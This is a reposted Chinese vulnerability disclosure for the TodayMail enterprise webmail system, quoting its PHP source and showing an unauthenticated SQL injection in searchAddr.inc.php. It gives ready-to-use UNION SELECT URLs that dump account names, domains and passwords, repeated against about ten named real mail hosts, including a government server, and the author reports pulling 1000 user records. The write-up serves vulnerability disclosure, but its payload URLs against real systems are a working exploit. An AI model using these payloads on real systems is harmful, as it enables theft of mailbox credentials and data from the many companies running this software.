TodayMail某处无需登陆的SQL注入可轻松导致大量企业邮箱帐号被脱裤

没穿底裤 2020年1月1日04:51:13评论511 views字数 4350阅读14分30秒阅读模式
摘要

TodayMail,时代企业邮,简介如下:http://www.now.cn/email/overview.net搜索关键字:时代企业邮


漏洞作者: xfkxfk

详细说明:

TodayMail,时代企业邮,简介如下:

http://www.now.cn/email/overview.net

搜索关键字:时代企业邮

案例很多,就不截图了

文件searchAddr.inc.php

<?  header('Content-Type:text/xml;charset=UTF-8');  include_once "../config/dbremote.inc.php";  include_once "../../core/emailcore.class.inc.php";    $value=trim($_REQUEST['value']);  $tm_id=trim($_REQUEST['ftm_id']);  $EmailCore = new EmailCore($tm_id);  $addrList=$EmailCore->searchAddrAllByKeyword($value);  $str="<?xml version=/"1.0/" encoding=/"UTF-8/"?><properties><property>";  $str.="<num>".count($addrList)."</num>";  for($i=0;$i<count($addrList);$i++){          $str.="<name".$i.">".$addrList[$i]['name']."</name".$i.">";          $str.="<email".$i.">".$addrList[$i]['email']."</email".$i.">";  }  $str.="</property></properties>";  echo $str;  ?>

 

第一:

可以看到这里没有包含登录验证的文件,所以可以无需登录即可直接访问

然后$value=trim($_REQUEST['value']);

接着$addrList=$EmailCore->searchAddrAllByKeyword($value);

跟进函数searchAddrAllByKeyword,文件emailcore.class.inc.php

function searchAddrAllByKeyword($value){                  //global $db_remote;                  $addrArray=array();                  $sql="select name,email from address  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";                  $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());                  while($array=mysql_fetch_assoc($rs)){                          $addrArray[]=$array;                  }                  $sql="select tm_name as name,tm_domain as email from todaymail  where tm_domain='".$this->EmailInfo['tm_domain']."' and (tm_name like '%$value%' or tm_domain like '%$value%') and tm_status in (1,3) and tm_level <> '1' order by tm_name asc";  //              echo $sql;                  $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());                  while($array=mysql_fetch_assoc($rs)){                          $array['email']=$array['name']."@".$array['email'];                          $addrArray[]=$array;                  }                  $sql="select name,email from mailcard  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";                  $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());                  while($array=mysql_fetch_assoc($rs)){                          $addrArray[]=$array;                  }                  return $addrArray;          }

 

清楚的看到变量$value直接进入select sql语句了,没有进行任何过滤处理,导致SQL注入漏洞产生。。。

这里是没有登录的直接拿到数据

可惜的是没有拿到服务器权限,而且通过域名看到,这里存在大量的企业。

以官网为例吧:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,%27@@@%27,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

通过这里的tm_domain域名字段,可以看到存在4000个域名

TodayMail某处无需登陆的SQL注入可轻松导致大量企业邮箱帐号被脱裤

去重也存在3000多个域名,意味着有3000多个企业咯

漏洞证明:

以官网为例吧:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

这里读取了1000个用户的用户名,域名,密码

TodayMail某处无需登陆的SQL注入可轻松导致大量企业邮箱帐号被脱裤

再随便给几个例子:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361  http://mail.wfq.gov.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 http://streamline.com.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 http://mail.inkbank.com.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 http://mail.zhangjiang.net/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 http://mail.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 http://mx601.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 http://mx605.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 http://mx606.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 http://mx621.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

 

而且数据库很多,邮件内容等都会泄漏的。

用户量很大,应该是高危漏洞,很多企业的邮箱系统基本上都会沦陷。

修复方案:

包含登录验证文件,过滤

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:51:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   TodayMail某处无需登陆的SQL注入可轻松导致大量企业邮箱帐号被脱裤http://cn-sec.com/archives/76581.html

发表评论

匿名网友 填写信息